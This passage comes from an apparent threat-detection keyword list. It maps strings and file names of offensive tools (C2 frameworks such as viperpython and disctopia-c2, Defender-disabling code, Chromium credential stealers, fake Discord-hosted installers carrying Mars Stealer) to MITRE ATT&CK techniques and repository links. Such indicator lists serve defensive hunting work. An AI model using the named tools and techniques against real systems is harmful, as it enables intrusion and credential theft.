T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*DisableMailboxAuditing.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*DisableMFA.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*DisableRealtimeMonitoring $true*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,0,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*disableWinDef.cpp*,offensive_tool_keyword,WinDefenderKiller,Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys,T1562.001 - T1055.002 - T1070.004,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/S12cybersecurity/WinDefenderKiller,1,1,N/A,10,4,327,47,2023-07-27T11:06:24Z,2023-07-25T10:32:25Z -*Disabling ASLR *,offensive_tool_keyword,frampton,PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible,T1055 - T1548.002 - T1129 - T1001,TA0002 - TA0003- TA0004 -TA0011,N/A,N/A,POST Exploitation tools,https://github.com/ins1gn1a/Frampton,1,1,N/A,N/A,1,69,16,2019-11-24T22:34:48Z,2019-10-29T00:22:14Z -*discordapp.com/attachments/*/AnyDesk.exe*,offensive_tool_keyword,anydesk,Fake Anydesk distributed by discord - mars stealer,T1566 T1587,N/A,N/A,N/A,Malware,https://www.virustotal.com/gui/url/f83616f0f9cd2337ed40e22b0a675a99d58edf004b31645f56f28f020f5e4f46/detection,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*discordapp.com/attachments/*/BOINCPortable_*.exe*,offensive_tool_keyword,BOINC,Fake BOINC software distributed by discord - mars stealer,T1566 T1587,N/A,N/A,N/A,Malware,https://cyberint.com/wp-content/uploads/2022/02/Mars-Stealer-7.png.webp,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Discovery_AccountDiscovery_GetNetDomainUser.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_AccountDiscovery_PowerView.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_ApplicationWindowDiscovery_EnumApplication.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_Microphone_CallInfo.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_Microphone_camera.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_Microphone_record_mic.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_NetworkServiceScanning_ARPScan.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_NetworkServiceScanning_NbtScanByPython.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_NetworkServiceScanning_NextnetByPE.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_NetworkServiceScanning_PingByPython.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_NetworkServiceScanning_PortScanByPython.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_NetworkServiceScanning_PortScanWithServiceByPython.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_NetworkShareDiscovery_PowerView.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_PermissionGroupsDiscovery_PowerView.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_QueryRegistry_GetDotNetVersions.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_QueryRegistry_GetRDPPort.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_RemoteSystemDiscovery_GetDomainIPAddress.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_RemoteSystemDiscovery_GetNetComputer.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_RemoteSystemDiscovery_GetNetDomain.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_RemoteSystemDiscovery_GetNetDomainController.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_SecuritySoftwareDiscovery_ListAVByTasklist.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_SystemNetworkConnectionsDiscovery_GetPublicIP.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_SystemUserDiscovery_GetLastLoggedOn.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_SystemUserDiscovery_GetLoggedOnLocal.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Disctopia Backdoor*,offensive_tool_keyword,disctopia-c2,Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s,T1105 - T1043 - T1102,TA0003 - TA0008 - TA0002,N/A,N/A,C2,https://github.com/3ct0s/disctopia-c2,1,0,N/A,10,10,321,89,2023-09-26T12:00:16Z,2022-01-02T22:03:10Z -*disctopia-c2.git*,offensive_tool_keyword,disctopia-c2,Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s,T1105 - T1043 - T1102,TA0003 - TA0008 - TA0002,N/A,N/A,C2,https://github.com/3ct0s/disctopia-c2,1,1,N/A,10,10,321,89,2023-09-26T12:00:16Z,2022-01-02T22:03:10Z -*disctopia-c2-main.zip*,offensive_tool_keyword,disctopia-c2,Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s,T1105 - T1043 - T1102,TA0003 - TA0008 - TA0002,N/A,N/A,C2,https://github.com/3ct0s/disctopia-c2,1,1,N/A,10,10,321,89,2023-09-26T12:00:16Z,2022-01-02T22:03:10Z -*DiskCryptor Device Installation Disk*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,0,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*DiskCryptor driver*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,0,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*DISKCRYPTOR_MUTEX*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,0,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*diskcryptor2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*DiskCryptor-master*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,1,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*diskshadow list shadows all*,greyware_tool_keyword,diskshadow,List shadow copies using diskshadow,T1059.003 - T1059.001 - T1005,TA0002 - TA0005 - TA0010,N/A,N/A,discovery,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*dist*_brc4.x64.o*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,0,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*dist*_brc4.x86.o*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,0,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*dist/agent.upx.exe*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,1,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*dist/agent.windows.exe*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,1,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*dist/nanorobeus_cs.*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,1,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*dist/shadow.exe*,offensive_tool_keyword,ShadowForgeC2,ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.,T1071.001 - T1569.002 - T1059.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/0xEr3bus/ShadowForgeC2,1,1,N/A,10,10,35,5,2023-07-15T11:45:36Z,2023-07-13T11:49:36Z -*dist\shadow.exe*,offensive_tool_keyword,ShadowForgeC2,ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.,T1071.001 - T1569.002 - T1059.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/0xEr3bus/ShadowForgeC2,1,0,N/A,10,10,35,5,2023-07-15T11:45:36Z,2023-07-13T11:49:36Z -*ditty/ditty.c*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SimoneLazzaris/ditty,1,1,N/A,N/A,1,2,1,2022-03-10T16:15:14Z,2022-03-09T09:20:27Z -*djhohnstein/SharpChromium*,offensive_tool_keyword,SharpChromium,.NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.,T1555.003 - T1114.001 - T1555.004,TA0006 - TA0003,N/A,N/A,Credential Access,https://github.com/djhohnstein/SharpChromium,1,1,N/A,10,7,608,98,2020-10-23T22:28:13Z,2018-08-06T21:25:21Z -*dl.wireshark.org*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*dlink_central_wifimanager_rce.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*dlink_sharecenter_cmd_exec*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*dlink_telnet_backdoor_userpass*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*dll* [HIJACKABLE]*,offensive_tool_keyword,HijackHunter,Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity,T1574.002 - T1059.003 - T1078.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*dll\reflective_dll.*,offensive_tool_keyword,cobaltstrike,Cobaltstrike addons to interact with clipboard,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DallasFR/Cobalt-Clip,1,0,N/A,10,,N/A,,, -*dll_generator.py*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,1,private github repo,10,,N/A,,, -*dll_hijack_detect_x64*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*dll_hijack_detect_x86*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*dll_hijack_hunter*,offensive_tool_keyword,cobaltstrike,DLL Hijack Search Order Enumeration BOF,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth 